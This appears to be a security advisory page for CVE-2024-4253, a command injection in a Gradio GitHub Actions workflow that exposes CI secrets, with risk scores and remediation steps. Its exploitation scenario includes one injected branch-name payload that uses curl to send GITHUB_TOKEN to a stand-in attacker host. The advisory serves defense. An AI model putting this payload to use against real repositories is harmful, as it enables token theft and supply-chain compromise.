AI Threat Alert AI Threat Alert

CVE-2024-4253: Gradio: CI/CD command injection enables secrets exfiltration

CRITICAL PoC AVAILABLE
Published June 4, 2024
CISO Take

Gradio's GitHub Actions workflow contains a command injection flaw allowing any unauthenticated attacker to exfiltrate CI/CD secrets (GITHUB_TOKEN, COMMENT_TOKEN, CHROMATIC_PROJECT_TOKEN) by submitting a malicious pull request. Successful exploitation could enable supply chain compromise of published Gradio packages—affecting every downstream ML deployment that installs via pip. Patch immediately to a version past @gradio/video@0.6.12 and audit all GitHub Actions workflows for unsanitized use of GitHub context variables.

Risk Assessment

Critical risk. CVSS 9.1 with no authentication required, no user interaction, and network-accessible exploitation via any public PR submission. Gradio's dominance in ML prototyping, model demos, and Hugging Face Spaces means blast radius extends well beyond direct Gradio maintainers—a successful supply chain compromise cascades to thousands of downstream ML deployments. Attack complexity is trivial given well-documented GitHub Actions injection techniques and public PoC availability.

Affected Systems

Package Ecosystem Vulnerable Range Patched
gradio pip No patch
42.5K OpenSSF 5.6 674 dependents Pushed 8d ago 27% patched ~110d to patch Full package profile →

Do you use gradio? You're affected.

Severity & Risk

CVSS 3.1
9.1 / 10
EPSS
1.9%
chance of exploitation in 30 days
Higher than 83% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C High
I High
A None

Recommended Action

5 steps

  1. PATCH

    Update @gradio/video past 0.6.12; verify patch commit a0e70366 is present in your installed version.

  2. AUDIT

    Review all GitHub Actions workflows for unsanitized use of github.head_ref, github.event.pull_request.head.repo.full_name, or other PR-controllable context variables passed directly into run: steps.

  3. HARDEN

    Expose GitHub context values only via environment variables (never inline in run commands); apply principle of least privilege to GITHUB_TOKEN with explicit permissions: blocks.

  4. DETECT

    Monitor CI runner logs for unexpected outbound connections; set up secret scanning alerts for token exposure.

  5. DEPENDENCY HYGIENE

    Enable Dependabot or similar for Gradio and review all ML framework dependencies for CI/CD workflow files that may be reused in your pipelines.

CISA SSVC Assessment

Decision Track
Exploitation none
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Supply Chain Code Execution Data Extraction Framework Inference API AML.T0010.001 AML.T0025 AML.T0049 AML.T0050 AML.T0055

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 17 - Quality management system — supply chain Art. 9 - Risk management system
ISO 42001
A.5.23 - Information security for use of cloud services A.6.1.2 - AI risk assessment for third-party components
NIST AI RMF
GOVERN 6.1 - Policies and procedures for third-party AI component risk
OWASP LLM Top 10
LLM05:2023 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2024-4253?

Gradio's GitHub Actions workflow contains a command injection flaw allowing any unauthenticated attacker to exfiltrate CI/CD secrets (GITHUB_TOKEN, COMMENT_TOKEN, CHROMATIC_PROJECT_TOKEN) by submitting a malicious pull request. Successful exploitation could enable supply chain compromise of published Gradio packages—affecting every downstream ML deployment that installs via pip. Patch immediately to a version past @gradio/video@0.6.12 and audit all GitHub Actions workflows for unsanitized use of GitHub context variables.

Is CVE-2024-4253 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-4253, increasing the risk of exploitation.

How to fix CVE-2024-4253?

1. PATCH: Update @gradio/video past 0.6.12; verify patch commit a0e70366 is present in your installed version. 2. AUDIT: Review all GitHub Actions workflows for unsanitized use of `github.head_ref`, `github.event.pull_request.head.repo.full_name`, or other PR-controllable context variables passed directly into `run:` steps. 3. HARDEN: Expose GitHub context values only via environment variables (never inline in run commands); apply principle of least privilege to GITHUB_TOKEN with explicit `permissions:` blocks. 4. DETECT: Monitor CI runner logs for unexpected outbound connections; set up secret scanning alerts for token exposure. 5. DEPENDENCY HYGIENE: Enable Dependabot or similar for Gradio and review all ML framework dependencies for CI/CD workflow files that may be reused in your pipelines.

What systems are affected by CVE-2024-4253?

This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, CI/CD pipelines for ML projects, agent frameworks, MLOps workflows.

What is the CVSS score for CVE-2024-4253?

CVE-2024-4253 has a CVSS v3.1 base score of 9.1 (CRITICAL). The EPSS exploitation probability is 1.90%.

Technical Details

NVD Description

A command injection vulnerability exists in the gradio-app/gradio repository, specifically within the 'test-functional.yml' workflow. The vulnerability arises due to improper neutralization of special elements used in a command, allowing for unauthorized modification of the base repository or secrets exfiltration. The issue affects versions up to and including '@gradio/video@0.6.12'. The flaw is present in the workflow's handling of GitHub context information, where it echoes the full name of the head repository, the head branch, and the workflow reference without adequate sanitization. This could potentially lead to the exfiltration of sensitive secrets such as 'GITHUB_TOKEN', 'COMMENT_TOKEN', and 'CHROMATIC_PROJECT_TOKEN'.

Exploitation Scenario

An adversary targeting ML infrastructure submits a pull request to a public Gradio-based repository. The PR's branch name contains injected shell metacharacters: `feature/; curl https://attacker.com/exfil?t=$GITHUB_TOKEN #`. The test-functional.yml workflow echoes the head repository name or branch unsanitized inside a `run:` step, executing the injected command in the CI runner context. The attacker receives the GITHUB_TOKEN out-of-band and uses it to push malicious commits to the main branch or tamper with a GitHub Release artifact. Downstream ML teams installing Gradio via `pip install gradio` receive the backdoored package, compromising model serving endpoints, Gradio-based agent UIs, and any system where the framework runs with access to model weights or sensitive inference infrastructure.

Weaknesses (CWE)

CWE-78

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

References

Timeline

Published
June 4, 2024
Last Modified
October 15, 2025
First Seen
June 4, 2024

Related Vulnerabilities

CRITICAL CVE-2024-47167 9.8

Gradio: unauthenticated SSRF in /queue/join, internal pivot

Same package: gradio
CRITICAL CVE-2024-39236 9.8

Gradio: code injection via component metadata (CVSS 9.8)

Same package: gradio
CRITICAL CVE-2023-25823 9.8

Gradio: hardcoded SSH key leaks via share=True demos

Same package: gradio
CRITICAL CVE-2024-0964 9.4

Gradio: unauthenticated LFI exposes full server filesystem

Same package: gradio
CRITICAL CVE-2023-34239 9.1

Gradio: path traversal + SSRF exposes model files & infra

Same package: gradio
Back to Threat Feed